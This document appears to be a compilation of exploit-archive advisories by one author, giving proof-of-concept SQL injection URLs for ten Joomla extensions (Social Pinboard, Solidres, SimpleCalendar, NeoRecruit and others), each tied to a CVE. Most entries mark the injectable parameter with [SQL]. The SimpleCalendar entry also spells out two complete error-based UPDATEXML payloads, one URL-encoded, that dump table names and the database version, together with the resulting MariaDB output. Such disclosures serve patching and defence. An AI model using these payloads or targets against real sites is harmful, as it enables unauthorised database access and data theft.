Joomla! Pinterest Clone Social Pinboard 2.0 SQL Injection

Posted Feb 17, 2018
Authored by Ihsan Sencan

Joomla! Pinterest Clone Social Pinboard version 2.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2018-5987
MD5 | e15582754c3dfe6ef231fd4200178945
# # # # 
# Exploit Title: Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://www.apptha.com/
# Software Link: https://www.apptha.com/joomla/social-pinboard-script
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5987
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=ajaxcontrol&tmpl=component&task=getlikeinfo&pin_id=[SQL]&user_id=[SQL]
#
# 2)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=gift&starts=100&ends=[SQL]
#
# 3)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=home&category=[SQL]
#
# 4)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=pindisplay&uid=[SQL]
#
# 5)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=search&serachVal=[SQL]
#
# 6)
# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=likes&uid=[SQL]
#
# # # #

Joomla! Timetable Responsive Schedule For Joomla 1.5 SQL Injection

# # # #
# Exploit Title: Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://quanticalabs.com/joomla/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-responsive-schedule-for-joomla/
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6583
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_timetable&view=event&alias=[SQL]
#
# # # #

Joomla! Staff Master 1.0 RC 1 SQL Injection

# # # #
# Exploit Title: Joomla! Component Staff Master <= 1.0 RC 1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.systemsunited.net/
# Software Link: http://www.systemsunited.net/
# Version: <= 1.0 RC 1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5992
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_staffmaster&view=staff&name=[SQL]
#
# 2)
# http://localhost/[PATH]/index.php?option=com_staffmaster&view=staff&name=[SQL]
#
# # # #

Joomla! Solidres 2.5.1 SQL Injection

Posted Feb 17, 2018
Authored by Ihsan Sencan

Joomla! Solidres component version 2.5.1 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2018-5980
MD5 | 7ba02386bcc4a475c3adccf426cc7033
# # # # 
# Exploit Title: Joomla! Component Solidres 2.5.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://solidres.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/solidres/
# Version: 2.5.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5980
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php/en/component/solidres/?location=&checkin=2018-01-08&checkout=2018-01-09&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=0&option=com_solidres&task=hub.search&start=0&Itemid=306&9f3d70a896d5f1332174599ecac43607=1&ordering=score&direction=desc[SQL]&type_id=12
#
# http://localhost/[PATH]/index.php/en/component/solidres/?checkin=2018-01-08&checkout=2018-01-09&option=com_solidres&task=hub.search&direction=desc[SQL]
#
# # # #

Joomla! Smart Shoutbox 3.0.0 SQL Injection

# # # # 
# Exploit Title: Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://thekrotek.com/
# Software Link: https://extensions.joomla.org/extension/smart-shoutbox/
# Version: 3.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5975
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/component/smartshoutbox/archive?shoutauthor=[SQL]
#
# # # #

Joomla! SimpleCalendar 3.1.9 SQL Injection

# # # #
# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://albonico.ch/
# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html
# Version: 3.1.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5974
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]
#
#
# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]
#
#
# # # #

http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))

http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29
XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'

Joomla! Realpin 1.5.04 SQL Injection

# # # #
# Exploit Title: Joomla! Component Realpin <= 1.5.04 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://realpin.frumania.com/
# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-display/realpin/
# Software Download: http://realpin.frumania.com/downloads/com_realpin_j3.1_1.5.04.zip
# Version: <= 1.5.04
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6005
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_realpin&pinboard=[SQL]
#
# # # #

Joomla! Project Log 1.5.3 SQL Injection

# # # #
# Exploit Title: Joomla! Component Project Log 1.5.3 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://extensions.thethinkery.net/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/project-a-task-management/project-log/
# Version: 1.5.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6024
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_projectlog&view=cat&search=[SQL]
#
#
# # # #

Joomla! NeoRecruit 4.1 SQL Injection

# # # #
# Exploit Title: Joomla! Component NeoRecruit 4.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://neojoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/
# Version: 4.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6370
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/neorecruit/all-offers/xxx[SQL].html
# http://localhost/[PATH]/neorecruit/xxx/xxx[SQL]
#
# # # #

Joomla! MediaLibrary Free 4.0.12 SQL Injection

# # # # 
# Exploit Title: Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://ordasoft.com/
# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
# Software Download: http://ordasoft.com/All-Download/Download-document/173-Media-Library-basic-2.1.html
# Version: 4.0.12
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5971
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_medialibrary&task=view_author&id=[SQL]
#
# 2)
# http://localhost/[PATH]/index.php/component/medialibrary/0/lend_request?Itemid=0&mid[0]=[SQL]
#
# # # #